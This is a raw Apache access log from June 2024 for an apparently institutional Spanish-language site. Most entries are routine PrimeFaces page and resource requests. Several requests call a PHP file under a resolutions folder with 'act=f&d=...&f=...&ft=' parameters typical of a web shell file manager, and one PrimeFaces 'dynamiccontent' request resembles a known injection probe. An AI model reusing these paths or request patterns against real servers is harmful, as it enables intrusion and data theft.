47.128.120.57 - - [16/Jun/2024:15:42:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2075.pdf&ft=img&white=1 HTTP/1.1" 200 20239
47.128.17.246 - - [16/Jun/2024:15:43:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0244.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [16/Jun/2024:15:43:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:43:27 -0500] "HEAD / HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:15:43:30 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123982
161.18.222.72 - - [16/Jun/2024:15:43:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:31 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:43:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36308
161.18.222.72 - - [16/Jun/2024:15:43:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:43:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
47.128.120.74 - - [16/Jun/2024:15:43:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3270.pdf&ft=img&white=1 HTTP/1.1" 200 384783
201.245.192.253 - - [16/Jun/2024:15:44:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
